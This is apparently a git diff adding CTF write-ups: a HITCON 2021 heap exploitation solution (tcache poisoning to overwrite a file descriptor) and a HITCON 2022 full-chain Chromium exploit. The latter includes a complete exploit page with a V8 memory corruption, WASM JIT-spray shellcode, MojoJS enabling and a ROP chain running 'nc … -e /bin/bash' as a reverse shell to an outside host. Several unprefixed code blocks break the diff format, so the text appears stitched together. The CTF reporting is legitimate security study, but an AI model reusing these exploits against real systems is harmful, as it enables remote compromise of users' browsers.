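enum chunk { STALE, I_E, O_E, O_D, R1, R2, UNEXPECTED };

struct bin {
    enum chunk items[8];
    size_t len;
};

/* free(): push onto the bin (tcache is last-in, first-out). */
void bin_free(struct bin *b, enum chunk c) { b->items[b->len++] = c; }

/* malloc(0x10): reuse the most recently freed chunk, else carve `fresh`. */
enum chunk bin_malloc(struct bin *b, enum chunk fresh) {
    return b->len ? b->items[--b->len] : fresh;
}

/* Replays the feng shui and writes the final bin, head first, into out[]. */
size_t replay_feng_shui(enum chunk out[8]) {
    struct bin t = { .len = 0 };
    bin_free(&t, STALE); /* the single chunk left in the bin beforehand */

    enum chunk first = bin_malloc(&t, UNEXPECTED); /* takes STALE */
    enum chunk inp_prepare = bin_malloc(&t, I_E);  /* fresh chunk */
    enum chunk dont_free = bin_malloc(&t, O_E);    /* fresh chunk */
    enum chunk small = bin_malloc(&t, O_D);        /* fresh chunk */
    (void)bin_malloc(&t, R1);                      /* reserved_for_later */
    (void)bin_malloc(&t, R2);                      /* reserved_for_later2 */

    bin_free(&t, dont_free);
    bin_free(&t, first);
    (void)bin_malloc(&t, UNEXPECTED);              /* dont_free2 reuses first.buffer */
    enum chunk dont_free_begin = bin_malloc(&t, UNEXPECTED); /* reuses dont_free.buffer */
    bin_free(&t, small);
    bin_free(&t, dont_free_begin);
    bin_free(&t, inp_prepare);

    size_t n = 0;
    while (t.len)
        out[n++] = t.items[--t.len];
    return n;
}
```

In this model the bin ends up holding exactly three chunks, with `inp_prepare.buffer` at the head, followed by `dont_free.buffer` and `small.buffer`, which is the order the encrypt and decrypt steps rely on.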
+
+Therefore, the next part of our exploit looks as follows:
+
+```c
+res = do_crypto(THREEFISH_ENC, random_data, 24, test_key_idx);
+if (res < 0) {
+ puts("enc failed");
+}
+
+memcpy(temp_crypt, crypt_result, 24);
+
+size_t rid_of_inp = do_malloc(0x140);
+
+res = do_crypto(THREEFISH_DEC, temp_crypt, 24, test_key_idx);
+
+if (res < 0) {
+ puts("dec failed");
+}
+
+puts("smashed size!");
+```
+
+First we encrypt. This uses the first entry in the tcache as input and the second as output. Then we make sure to remove the first entry from the tcache. Next we decrypt; again the first entry in the tcache is the input (previously our output) and the second is the output. This all leads to our desired goal of smashing the size of `small.key_buf` with `0x160`.
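
Why the round trip lands the large size on top of $S$ does not depend on Threefish itself, only on decryption being the inverse of encryption. The sketch below demonstrates this with a toy invertible 32-byte transform that is explicitly NOT Threefish; the `region` layout (a 24-byte buffer followed by the next chunk's size field), the key and all names are assumptions made for the illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

static uint64_t rotl13(uint64_t x) { return (x << 13) | (x >> 51); }
static uint64_t rotr13(uint64_t x) { return (x >> 13) | (x << 51); }

/* Toy invertible 32-byte "cipher": a stand-in, not the real Threefish. */
void toy_encrypt(const uint64_t key[4], const uint64_t in[4], uint64_t out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = rotl13(in[i] ^ key[i]) + key[(i + 1) % 4];
}

void toy_decrypt(const uint64_t key[4], const uint64_t in[4], uint64_t out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = rotr13(in[i] - key[(i + 1) % 4]) ^ key[i];
}

/* A 24-byte heap buffer followed by the size field of the next chunk. */
struct region {
    uint64_t buf[3];
    uint64_t next_size;
};

/* Returns the size field of S after the encrypt/decrypt round trip. */
uint64_t smash_small_size(uint64_t large_size, uint64_t small_size) {
    const uint64_t key[4] = {0x0123456789abcdefULL, 0x1111111111111111ULL,
                             0xdeadbeefcafef00dULL, 0x42ULL};
    struct region i_e = {{0xaaaa, 0xbbbb, 0xcccc}, large_size}; /* I_E, then L */
    struct region o_e = {{0, 0, 0}, 0x81};                      /* O_E, then D */
    struct region o_d = {{0, 0, 0}, small_size};                /* O_D, then S */
    uint64_t in[4], out[4];

    memcpy(in, &i_e, sizeof in);   /* reads L's size as the last 8 input bytes */
    toy_encrypt(key, in, out);
    memcpy(&o_e, out, sizeof out); /* clobbers D's size with ciphertext */

    memcpy(in, &o_e, sizeof in);   /* reads the clobbered size of D back in */
    toy_decrypt(key, in, out);
    memcpy(&o_d, out, sizeof out); /* writes L's size over S's size */

    return o_d.next_size;
}
```

Since the decryption sees the complete, unmodified ciphertext (24 bytes from the buffer plus the 8 bytes that overflowed into D's size field), it reproduces the original plaintext, whose last 8 bytes were the size of $L$.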
+
+We now malloc and free `small.key_buf`, to put it onto the correct tcache:
+
+```c
+size_t small_smashed = do_malloc(0x50);
+do_free(small_smashed);
+```
+
+The next time we add a key of size `0x150`, we will overflow `small.key_buf` by a lot!
+We now free the chunks reserved for later:
+
+```c
+do_free(reserved_for_later2);
+do_free(reserved_for_later);
+```
+
+This will now do the following for the tcache of size 0x40 (remember that those chunks' tree_nodes were allocated after `small.key_buf`):
+
+```
+head -> reserved_for_later.tree_node -> reserved_for_later2.tree_node -> ...
+```
+
+When we now overflow `small.key_buf`, we can set `fd` of the chunks that are in tcache.
+Due to the way the allocations work, we need to create some fake chunks first, which we point to.
+The fake chunks are created as follows inside dram:
+
+```c
+puts("Creating fake chunks");
+
+uint64_t* fake_chunk = dram + 0x20000;
+uint64_t* fake_chunk2 = dram + 0x20080;
+fake_chunk[-1] = 0x41;
+fake_chunk[0] = fake_chunk2;
+fake_chunk[1] = 0;
+
+fake_chunk2[-1] = 0x41;
+// this is the address we actually wanna overwrite
+fake_chunk2[0] = fd_addr;
+fake_chunk2[1] = 0;
+
+uint64_t* fake_chunk4 = dram + 0x20100;
+fake_chunk4[-1] = 0x21;
+fake_chunk4[0] = 0;
+fake_chunk4[1] = 0;
+
+uint64_t* fake_chunk3 = dram + 0x20180;
+fake_chunk3[-1] = 0x21;
+fake_chunk3[0] = fake_chunk4;
+fake_chunk3[1] = 0;
+```
+
+Now we can finally overflow:
+
+```c
+puts("smashing actual chunks");
+
+memset(overwrite, 'A', sizeof(overwrite));
+
+uint64_t* over = &overwrite[0];
+
+// Due to the free of the reserved_for_later chunks
+// We also need to fixup these buffer chunks on the heap.
+over[31] = 0x21;
+over[32] = fake_chunk3;
+over[33] = 0;
+// This is our actual target!
+over[23] = 0x41;
+over[24] = fake_chunk;
+over[25] = 0;
+
+size_t my_key = add_key(overwrite, sizeof(overwrite));
+```
+
+The tcache for 0x20 and 0x40 now looks as follows:
+
+```c
+head[0x20] -> reserved_for_later.buffer -> fake_chunk3 -> fake_chunk4
+head[0x40] -> fake_chunk -> fake_chunk2 -> fd_addr // location of flag1 file descriptor
+```
+
+Hence, if we create two keys of length 0x30, the second key allocation will be overwriting fd_addr, allowing us to change the file descriptor from flag1 to the one for flag3. Then we can just reuse our exploit for the first flag:
+
+```c
+uint32_t* fd_over = &fd_overwrite[0];
+// remote:
+*fd_over = 1;
+// local:
+// *fd_over = 4;
+size_t fd_key = add_key(fd_overwrite, 0x30);
+size_t fd_key2 = add_key(fd_overwrite, 0x30);
+
+puts("Read flag");
+
+while (true) {
+ syscall1(0xC89FC, dram);
+
+ printf("flag: %s\n", dram);
+
+ for (int i = 0x100; i < 0x50000; i += 0x100) {
+ memcpy(dram + i, dram, 0x100);
+ }
+}
+```
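
The claim that the second key's data lands on `fd_addr` can be checked against the two poisoned bins with a small model. It assumes the bins look exactly as listed above and that each key of length 0x30 performs `malloc(0x10)`, `malloc(0x30)`, `malloc(0x30)` in that order, each call simply popping the head of the matching bin (tcache entry counts are ignored). All names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

enum chunk { RESERVED_BUF, FAKE3, FAKE4, FAKE, FAKE2, FD_ADDR, FRESH };

/* A singly linked tcache bin, modelled as a cursor over an array. */
struct list {
    const enum chunk *next;
    size_t left;
};

enum chunk take(struct list *l) {
    if (l->left == 0)
        return FRESH; /* bin empty: malloc would carve a new chunk */
    l->left--;
    return *l->next++;
}

struct key {
    enum chunk buffer, key_buf, tree_node;
};

/* Model of adding a key of length 0x30: wrapper, key data, map node. */
struct key add_key_0x30(struct list *t20, struct list *t40) {
    struct key k;
    k.buffer = take(t20);
    k.key_buf = take(t40);
    k.tree_node = take(t40);
    return k;
}

/* Where does the data of the second key end up? */
enum chunk second_key_buf(void) {
    static const enum chunk bin20[] = {RESERVED_BUF, FAKE3, FAKE4};
    static const enum chunk bin40[] = {FAKE, FAKE2, FD_ADDR};
    struct list t20 = {bin20, 3}, t40 = {bin40, 3};
    (void)add_key_0x30(&t20, &t40); /* consumes fake_chunk and fake_chunk2 */
    return add_key_0x30(&t20, &t40).key_buf;
}
```

The first key uses up both fake 0x40 chunks (one for its data, one for its tree node), so the data of the second key is copied to `fd_addr`. The fake 0x20 chunks exist only so that the wrapper allocations have somewhere harmless to go.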
+
+[^1]: Note that the mallocs will actually happen at different times, this is just to illustrate the basic idea.
+
+Flag: `hitcon{threefishes~sandbox~esacape}`
+
+## Conclusion
+
+Thanks to david942j and lyc for putting together this series of challenges, they were really fun to solve. You can find the source code for the challenges together with the official solution [on github](https://github.com/david942j/hitcon-2021-chaos). Until next time!
diff --git a/HITCON-2021/pwn/chaos1.jpg b/HITCON-2021/pwn/chaos1.jpg
new file mode 100755
index 0000000..c0bfe6e
Binary files /dev/null and b/HITCON-2021/pwn/chaos1.jpg differ
diff --git a/HITCON-2021/pwn/chaos2.jpg b/HITCON-2021/pwn/chaos2.jpg
new file mode 100755
index 0000000..6c2483f
Binary files /dev/null and b/HITCON-2021/pwn/chaos2.jpg differ
diff --git a/HITCON-2021/pwn/chaos3.jpg b/HITCON-2021/pwn/chaos3.jpg
new file mode 100755
index 0000000..53632df
Binary files /dev/null and b/HITCON-2021/pwn/chaos3.jpg differ
diff --git a/HITCON-2022/index.html b/HITCON-2022/index.html
new file mode 100755
index 0000000..87d4368
--- /dev/null
+++ b/HITCON-2022/index.html
@@ -0,0 +1,239 @@
+
+
+
+
+
+HITCON CTF 2022 | Organisers
+
+
All these years of training has lead to this moment.
+
+
Show us who’s the best pwner in the world !
+
+
+
The last challenge in the series is about chaining together the four bugs. The challenge runs Linux with the vulnerable module inside the patched Virtualbox, and runs the patched Chromium with both bugs inside this VM. We can provide the URL of our own webpage and the challenge will open it in the patched Chromium. We have to get the flag which is outside the VM.
+
+
Escaping the VM once we have a root shell inside is easy: we only need to load the exploit module from the VM escape challenge. Getting a root shell from an unsandboxed unprivileged shell is also easy because we can reuse the kernel exploit from the kernel challenge. The only part that is slightly more problematic is chaining the renderer compromise with the browser sandbox escape.
+
+
The sandbox escape needs to send Mojo messages to the browser process to interact with the vulnerable IPC service. The easiest way to do that from a compromised renderer is to enable MojoJS. Using MojoJS also means that we can reuse the exploit from the sandbox escape part unmodified which is nice because it saves us some work. There is a well-documented way to enable Mojo in a compromised renderer with arbitrary R/W, described by Mark Brand in a Project Zero bug. I reused the code that I wrote for the Full Chain challenge at Google CTF 2021 for this.
+
+
Now the only thing we need is arbitrary read and write in the renderer. Unfortunately we had cheesed the V8 challenge by loading the flag into the sandboxed heap with Realm.eval instead of actually bypassing the V8 sandbox. This was good enough for that challenge where we only had to read a file, but it won’t work here. We need an actual bypass for the V8 sandbox.
+
+
Uncheesing the V8 Exploit
+
+
Earlier this year DiceCTF had a challenge where players had to find bypasses for the V8 sandbox. The sandbox is now enabled by default in V8 but it’s still pretty new and there are many bypasses that haven’t been fixed yet. Funnily enough I had discovered the Realm.eval cheese when attempting to solve that challenge near the end of the CTF but I couldn’t use it because the flag was located at an unguessable path. I remembered that Kylebot from Shellphish had published a writeup for that challenge so I started by reading it.
+
+
Kylebot’s bypass uses WASM and overwrites imported_mutable_globals in a WasmInstance object to get arbitrary read and write. Unfortunately this bypass has been patched out and doesn’t work anymore in the version of V8 used in this challenge. Even then I still thought I should take a look at the WasmInstance because it had a lot of native pointers in Kylebot’s writeup:
Most of the pointers appear to be sandboxed now but there are still a few that are not. I started experimenting by overwriting each of those with 0x41414141 in GDB before calling into the wasm code and got some crashes. The most interesting one was from overwriting the pointer at offset 0x60 because it gave us RIP control:
This is very interesting because even though we can’t directly overwrite the generated machine code (which is RWX) we can still place some controlled data there by embedding it in immediates and then jumping into the middle of the immediate by overwriting this pointer (JIT spray attack).
+
+
Interestingly, Kylebot notes in his writeup that
+
+
+
After a few trials, I still couldn’t let V8 to dereference this pointer. After following the trace, @adamd and I found out that the real pointer used for invoking the shellcode resides on ptmalloc heap, which is outside of the cage.
+
+
+
It seems that this might have changed in newer versions of V8 and that this attack is now possible.
+
+
The gist of the attack is that we will compile a WASM function similar to this
and choose the floating-point values so that their binary encoding is also valid machine code. By jumping into the next immediate when we run out of space we can construct an arbitrarily long instruction sequence. And since V8’s WASM compiler is deterministic we just have to add an offset to the pointer we were just overwriting to execute our sprayed shellcode.
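
As an illustration of how such an immediate can be built, here is a minimal sketch that packs up to six bytes of machine code, NOP padding and a trailing short jump into the eight bytes of a double. The layout (six code bytes followed by `eb 0b`) is read off the first WASM module in the final exploit at the end of this page; the helper name `pack_gadget` is made up.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Builds one 8-byte immediate: up to 6 bytes of code, NOP padding,
 * then `jmp short jmp_disp` to hop into the next immediate.
 * Returns 0 on success, -1 if the code does not fit. */
int pack_gadget(const uint8_t *code, size_t len, uint8_t jmp_disp, double *out) {
    uint8_t bytes[8];
    if (len > 6)
        return -1;
    memset(bytes, 0x90, 6);   /* nop padding */
    memcpy(bytes, code, len);
    bytes[6] = 0xeb;          /* jmp short */
    bytes[7] = jmp_disp;
    memcpy(out, bytes, sizeof bytes); /* reinterpret the bytes as a double */
    return 0;
}
```

For example, packing `48 c1 e2 20` (`shl rdx, 32`) with a displacement of `0x0b` produces the byte sequence `72,193,226,32,144,144,235,11` that follows a `68` (`f64.const`) opcode in the module bytes.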
+
+
By inspection in GDB we can see that the calling convention that V8 uses for WASM is register-based with 32-bit integer arguments passed in eax, edx, ecx and integer values are returned in eax. The following shellcode gives us arbitrary read and write outside of the sandbox 1:
Except, there is a slight problem. The code pointer that we are overwriting only seems to be used once, the first time a function in that WASM instance is called. After that it’s not used anymore and the JIT spray doesn’t work. This probably has to do with lazy compilation. Creating a new WASM instance every time we want to read or write almost works, but not quite. It seems that V8 also has a cache of compiled WASM bytecode, so if we attempt to create two completely different WASM modules that use the same bytecode it will only compile the code once, so the JIT spray attack only works on the first.
+
+
Our solution was simply to change the WASM bytecode every time we create a new instance. We just selected some byte that didn’t appear to have an effect on the shellcode when changed and wrote some JavaScript that increments that byte every time we create a new WASM instance. Very hacky but it works.
+
+
Now that we have arbitrary R/W in the renderer process we just need to leak the base of the chrome binary and enable MojoJS. There are probably tons of ways to do this, we used a pointer inside the WASM code page.
+
+
After toggling the MojoJS flag we just have to reload the page and we will have MojoJS, so we can run the Sandbox exploit from before.
+
+
The final exploit html can be found at the end of this page.
+
+
GUI Troubles
+
+
Since we just had too much fun solving these challenges, we decided to go all out for the writeup and make the exploit work while running everything with a GUI (i.e. like a person normally would).
+In theory of course, this should have been a cake walk and it would only require us to install the GUI packages everywhere and set the corresponding settings / flags.
+Unfortunately, it was not that easy.
+
+
Installing the GUI was already quite tricky and I had to set up a completely new VM for it, since installing it on my droplet resulted in all network connections being dropped.
+This proved to be a bit tricky, due to wanting to use a VM in VM setup (so I don’t accidentally mess up my actual system).
+This meant I had to use nested virtualization which should be supported by VirtualBox out of the box.
+My host OS was Windows, since that was the machine I had lying around with nested virtualization supported.
+It took many restarts and convincing Windows that I did not need any kind of safety features to disable Hyper-V and get nested virtualization in VirtualBox working.
+Now I only had to get Chrome working with a GUI, which turned out to be a bit of a pain as well.
+The build provided by the challenge authors unfortunately was missing some necessary resources, e.g. the crash handler.
+Thankfully, Nspace did a local compile of the patched Chrome for local debugging and I was able to get the GUI working by copying over random files from his build.
+
+
Once that was out of the way, I could finally start.
+After some very minor tweaking, the last two steps worked quite well again, even with the GUI.
+However, the first two stages were not working at all.
+The first stage was failing to leak the code pointer, and it turned out that the read outside the V8 sandbox was broken.
+I wasted quite some time here until I finally (grudgingly) installed gdb in the inner VM and attached to chrome.
+It turned out that my new setup was using different instructions (likely due to being an AMD CPU) for compiling the WASM code and hence the offset used had to change.
+Once that was fixed, the first stage was working again.
+
+
The second stage was still broken though and would always crash at the same place with similar register contents:
Looking at the assembly, the culprit was R15.
+I compared the crash log to one without the GUI; there, either the exploit succeeded or R15 was null or 0x20.
+I realized that when the GUI was enabled, there must be some UAF detection happening that memsets freed chunks to 0xef.
+After scouring the Chromium codebase for a few hours (and wasting a lot of time trying to make it work with different timings of the race), I finally figured out that it is their new partition allocator:
+
+
// TODO(keishi): Add PA_LIKELY when brp is fully enabled as |brp_enabled| will
+ // be false only for the aligned partition.
+ if (brp_enabled()) {
+   auto* ref_count = internal::PartitionRefCountPointer(slot_start);
+   // If there are no more references to the allocation, it can be freed
+   // immediately. Otherwise, defer the operation and zap the memory to turn
+   // potential use-after-free issues into unexploitable crashes.
+   if (PA_UNLIKELY(!ref_count->IsAliveWithNoKnownRefs() &&
+                   brp_zapping_enabled()))
+     internal::SecureMemset(object, internal::kQuarantinedByte,
+                            slot_span->GetUsableSize(this));
+
+
+
I did not figure out whether this is just not enabled when running with --headless or the GUI just causes the memset to happen due to other factors.
+In the end, I decided to just disable the new allocator with a command line flag2.
+
+
With all of that fixed, the exploit finally worked when running under a GUI and we were able to capture this glorious video :P (I recommend you turn on sound):
+
+
+
+
Final Exploit HTML
+
+
<html>
+<head>
+
+<script src="http://chain.galli.me:8080/mojo/mojo_bindings.js"></script>
+<script src="http://chain.galli.me:8080/mojo/third_party/blink/public/mojom/sandbox/sandbox.mojom.js"></script>
+
+<script>
+const server_url = 'http://chain.galli.me:8080'
+let printbuf = [];
+function print(msg) {
+  printbuf.push(msg);
+}
+
+let f64view = new Float64Array(1);
+let u8view = new Uint8Array(f64view.buffer);
+let u64view = new BigUint64Array(f64view.buffer);
+let i32view = new Int32Array(f64view.buffer);
+let u32view = new Uint32Array(f64view.buffer);
+
+function d2i(x) {
+  f64view[0] = x;
+  return u64view[0];
+}
+
+function i2d(x) {
+  u64view[0] = x;
+  return f64view[0];
+}
+
+function s2u(x) {
+  i32view[0] = x;
+  return u32view[0];
+}
+
+function hex(x) {
+  return `0x${x.toString(16)}`;
+}
+
+function assert(x, msg) {
+  if (!x) {
+    throw msg;
+  }
+}
+
+async function renderer() {
+  let hole = [].hole();
+  let map = new Map(); // len = 0, 2 buckets
+  map.set(1, 1); // len = 1, 2 buckets
+  map.set(hole, 1); // len = 2, 2 buckets
+  map.delete(hole); // len = 2, 2 buckets
+  map.delete(hole); // len = 0x00048b55, 2 buckets, 2 deleted, pointed to map has len = 0, no deleted, 2 buckets
+  map.delete(1); // len = 0x00048b55, 2 buckets, 2 deleted, points to another map, points to something with len = -1
+  let a = [];
+  map.set(0x10, -1); // set the number of buckets to 0x10
+
+  a.push(1.1);
+
+  let b = [];
+  map.set(b, 1337); // overwrite the length of the array
+
+  let c = new Uint32Array(16);
+  a[23] = i2d(0x1337133700000000n);
+
+
+  let d = [a];
+  let e = [d];
+
+  let d_addr = c[46] - 1;
+
+  a[24] = i2d(0n);
+  a[25] = i2d(0n);
+
+  let d_elements = c[d_addr / 4 + 2] - 1;
+
+  function cageAddressOf(obj) {
+    d[0] = obj;
+    return c[d_elements / 4 + 2] - 1;
+  }
+
+  var global = new WebAssembly.Global({value: 'i64', mutable: true}, 0n);
+  var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,135,128,128,128,0,1,96,2,127,127,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,101,109,101,0,0,10,224,128,128,128,0,1,218,128,128,128,0,0,32,0,184,68,55,19,55,19,55,19,55,19,160,32,1,184,160,68,72,193,226,32,144,144,235,11,160,68,72,9,208,144,144,144,235,11,160,68,139,0,144,144,144,144,235,11,160,68,195,144,144,144,144,144,235,11,160,68,72,193,224,32,144,144,235,11,160,68,72,9,194,144,144,144,235,11,160,68,137,10,195,144,144,144,235,11,160,171,11]);
+  var wasm_mod = new WebAssembly.Module(wasm_code);
+  var wasm_instance = new WebAssembly.Instance(wasm_mod, {js: {global}});
+  let f = wasm_instance.exports.meme;
+
+  f(0x13371337, 0x13381338);
+  const code_addr = BigInt(c[cageAddressOf(wasm_instance) / 4 + 24]) | (BigInt(c[cageAddressOf(wasm_instance) / 4 + 25]) << 32n);
+
+  let i = 0;
+
+  function makeInstance() {
+    var global2 = new WebAssembly.Global({value: 'i64', mutable: true}, 0n);
+    var wasm_code2 = new Uint8Array([0,97,115,109,1,0,0,0,1,136,128,128,128,0,1,96,3,127,127,127,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,142,128,128,128,0,2,6,109,101,109,111,114,121,2,0,1,97,0,0,10,238,128,128,128,0,1,232,128,128,128,0,0,32,0,184,68,55,19,55,19,55,19,55,19,160,32,1,184,160,32,2,184,160,68,72,139,9,56,192,144,116,6,160,68,104,0,16,0,0,144,116,6,160,68,94,72,49,255,56,192,116,6,160,68,104,255,15,0,0,95,116,6,160,68,72,247,215,144,144,144,116,6,160,68,72,33,207,56,192,144,116,6,160,68,42,240,83,106,10,88,116,6,160,68,81,15,5,195,0,0,0,1,160,171,11]);
+    wasm_code2[wasm_code2.length - 4] = i;
+    i++;
+
+    var wasm_mod2 = new WebAssembly.Module(wasm_code2);
+    var wasm_instance2 = new WebAssembly.Instance(wasm_mod2, {js: {global2}});
+    return wasm_instance2;
+  }
+
+  function read32(addr) {
+    let wasm_instance2 = makeInstance()
+    let f2 = wasm_instance2.exports.a;
+
+    const shellcode_addr = code_addr + 0x680n + 0x25n + 0x1fn;
+    c[cageAddressOf(wasm_instance2) / 4 + 24] = Number(shellcode_addr & 0xffffffffn);
+    c[cageAddressOf(wasm_instance2) / 4 + 25] = Number((shellcode_addr >> 32n) & 0xffffffffn);
+    return s2u(f2(Number(addr & 0xffffffffn), Number((addr >> 32n) & 0xffffffffn)));
+  }
+
+  function write32(addr, val) {
+    let wasm_instance2 = makeInstance()
+    let f2 = wasm_instance2.exports.a;
+
+    const shellcode_addr = code_addr + 0x680n + 0x25n + 0x6bn;
+    c[cageAddressOf(wasm_instance2) / 4 + 24] = Number(shellcode_addr & 0xffffffffn);
+    c[cageAddressOf(wasm_instance2) / 4 + 25] = Number((shellcode_addr >> 32n) & 0xffffffffn);
+    f2(Number((addr >> 32n) & 0xffffffffn), Number(addr & 0xffffffffn), val);
+  }
+
+  function read64(addr) {
+    return BigInt(read32(addr)) | (BigInt(read32(addr + 4n)) << 32n);
+  }
+
+  let leakInstance = makeInstance();
+  let codePointer = BigInt(c[cageAddressOf(leakInstance) / 4 + 24]) | (BigInt(c[cageAddressOf(leakInstance) / 4 + 25]) << 32n);
+  let textPointer = read64(codePointer + 0x148n)
+  print(`Code pointer: ${hex(codePointer)}`);
+  print(`Text pointer: ${hex(textPointer)}`);
+
+  let chrome_base = textPointer - 0x590ce00n;
+
+  // From https://github.com/google/google-ctf/blob/master/2021/quals/pwn-fullchain/healthcheck/chromium_exploit.html#L122
+  // nm chrome | grep g_frame_map | awk '{print $1}'
+  const g_frame_map_offset = 0x000000000e34d168n;
+  // Disassemble content::RenderFrameImpl::EnableMojoJsBindings
+  const enable_mojo_js_bindings_offset = 0x448n;
+
+  // g_frame_map is a LazyInstance<FrameMap>, i.e. a FrameMap preceded by a
+  // pointer to the FrameMap.
+  let frame_map_ptr = chrome_base + g_frame_map_offset;
+  let g_frame_map = read64(frame_map_ptr);
+  assert(g_frame_map === frame_map_ptr + 8n, 'failed to find g_frame_map');
+  print(`g_frame_map: ${hex(g_frame_map)}`);
+
+  // FrameMap is a std::map<blink::WebFrame*, RenderFrameImpl*>, which is
+  // implemented as a red-black tree in libc++. We'll assume that there is
+  // only one element in the map. The first 8 bytes in the std::map point to
+  // the (only) node.
+  // The layout of a node is as follows:
+  // 0: p64(left)
+  // 8: p64(right)
+  // 16: p64(parent)
+  // 24: p64(is_black) (yes this is a boolean but it takes 64 bits)
+  // 32: key (in our case blink::WebFrame*)
+  // 40: value (in our case RenderFrameImpl*) <-- what we want
+  let g_frame_map_node = read64(g_frame_map);
+  print(`g_frame_map_node: ${hex(g_frame_map_node)}`);
+  let render_frame = read64(g_frame_map_node + 40n);
+  print(`render_frame: ${hex(render_frame)}`);
+
+  // This is a bool in RenderFrameImpl that controls whether JavaScript has
+  // access to the MojoJS bindings.
+  let enable_mojo_js_bindings_addr = render_frame + enable_mojo_js_bindings_offset;
+  write32(enable_mojo_js_bindings_addr, read32(enable_mojo_js_bindings_addr) | 1);
+  // We will have mojo after reloading the page, so do that
+  window.location.reload();
+}
+
+async function sbx() {
+ function newClient() {
+ let iface = new blink.mojom.SandboxPtr();
+ Mojo.bindInterface(blink.mojom.Sandbox.name, mojo.makeRequest(iface).handle);
+
+ return iface;
+ }
+
+ let fake = newClient();
+ const heap_leak = (await fake.getHeapAddress()).addr;
+
+ const text_leak = (await fake.getTextAddress()).addr;
+
+ print(`Text leak: ${hex(text_leak)}`);
+ const chrome_base = BigInt(text_leak) - 0x627fc20n;
+ print(`Chrome base: ${hex(chrome_base)}`);
+
+ const syscall = chrome_base + 0x0d8decafn; // syscall;
+ const move_stack = chrome_base + 0x08ff9a59n; // add rsp, 0x28; ret;
+ const pop_rdi = chrome_base + 0x0d8e655bn; // pop rdi; ret
+ const pop_rsi = chrome_base + 0x0d8cdf7cn; // pop rsi; ret;
+ const pop_rdx = chrome_base + 0x0d86e112n; // pop rdx; ret;
+ const pop_rax = chrome_base + 0x0d8e64f4n; // pop rax; ret;
+
+ let boxed_mem = BigInt(heap_leak) + 0x18n;
+ let fake_object = new BigUint64Array(0x800 / 8);
+
+ let prog_addr = boxed_mem - 7n;
+ let prog_arg = boxed_mem - 7n + 15n * 8n;
+ let prog_arg2 = prog_arg + 8n;
+
+ fake_object.fill(0x4141414141414141n);
+ fake_object[0] = 0x68732f6e69622fn; // /bin/sh
+ fake_object[1] = prog_addr;
+ fake_object[2] = prog_arg;
+ fake_object[3] = prog_arg2;
+ fake_object[4] = 0n;
+ fake_object[5] = chrome_base + 0x0590cc53n; // mov rsp, [rdi]; mov rbp, [rdi+8]; mov dword ptr [rdi+0x20], 0; jmp qword ptr [rdi+0x10];
+
+ fake_object[6] = pop_rdi;
+ fake_object[7] = prog_addr;
+ fake_object[8] = pop_rsi;
+ fake_object[9] = boxed_mem + 8n - 7n;
+ fake_object[10] = pop_rdx;
+ fake_object[11] = 0n;
+ fake_object[12] = pop_rax;
+ fake_object[13] = 59n;
+ fake_object[14] = syscall;
+
+ fake_object[15] = 0x632dn; // -c\x00\x00\x00
+
+ // nc chain.galli.me 1338 -e /bin/bash
+ fake_object[16] = 0x6e6961686320636en; // nc chain
+ fake_object[17] = 0x6d2e696c6c61672en; // .galli.m
+ fake_object[18] = 0x2d20383333312065n; // e 1338 -
+ fake_object[19] = 0x622f6e69622f2065n; // e /bin/b
+ fake_object[20] = 0x687361n; // ash\x00\x00\x00
+
+ fake.pourSand(new Uint8Array(fake_object.buffer));
+ print(`Fake object at: ${hex(boxed_mem)}`);
+
+ let clients = [];
+ for (let i = 0; i < 1000; i++) {
+ clients.push(newClient());
+ }
+
+ let spray = [];
+ for (let i = 0; i < 100; i++) {
+ spray.push(newClient());
+ }
+
+ let iface = newClient();
+
+ let arg2 = new BigUint64Array(0x1020 / 8);
+ arg2.fill(BigInt(boxed_mem) + 1n);
+ arg2[0x800 / 8 + 0x818 / 8] = 0n;
+ arg2[1 + 0x800 / 8] = 0x12354567n;
+ arg2[2 + 0x800 / 8] = move_stack;
+
+ let arg = new Uint8Array(arg2.buffer);
+
+ for (let i = 0; i < clients.length; i++) {
+ clients[i].pourSand(arg);
+ }
+
+ for (let i = 0; i < 100; i++) {
+ iface.pourSand(arg);
+ iface.ptr.reset();
+ iface = newClient();
+ }
+
+ for (let i = 0; i < spray.length; i++) {
+ spray[i].pourSand(arg);
+ }
+
+ print('done');
+}
+
+async function pwn() {
+ print('hello world');
+
+ try {
+ if (typeof(Mojo) === 'undefined') {
+ await renderer();
+ } else {
+ print(`Got Mojo!: ${Mojo}`);
+ await sbx();
+ }
+ } catch (e) {
+ print(`[-] Exception caught: ${e}`);
+ print(e.stack);
+ }
+
+ fetch(`${server_url}/logs`, {
+ method: 'POST',
+ body: printbuf.join('\n'),
+ });
+}
+
+pwn();
+
+</script>
+</head>
+</html>
+
The reason why we use rdx, rax to read but rax, rdx to write is that if the same floating-point constant is used twice in the function, the compiler will emit a load from memory instead of an immediate. So we can’t use the same sequence of instructions twice.
+
+
+
Yeah this is kinda cheating, but then again, the challenge was not made with this in mind and I also had to finish this writeup at some point :P. Also I forgot the command line flag, so if you came here looking for that, sorry :/.
+
diff --git a/HITCON-2022/pwn/fourchain-fullchain.md b/HITCON-2022/pwn/fourchain-fullchain.md
new file mode 100755
index 0000000..52e4279
--- /dev/null
+++ b/HITCON-2022/pwn/fourchain-fullchain.md
@@ -0,0 +1,563 @@
+# Fourchain - One For All
+
+**Authors:** [Nspace](https://twitter.com/_MatteoRizzo), [gallileo](https://twitter.com/galli_leo_)
+
+**Tags:** pwn, browser, v8, linux, virtualbox
+
+**Points:** 500
+
+> One challenge for all the vulnerabilities.
+>
+> All these years of training has lead to this moment.
+>
+> Show us who's the best pwner in the world !
+
+The last challenge in the series is about chaining together the four bugs. The challenge runs Linux with the vulnerable module inside the patched VirtualBox, and runs the patched Chromium with both bugs inside this VM. We can provide the URL of our own webpage and the challenge will open it in the patched Chromium. We have to get the flag, which is outside the VM.
+
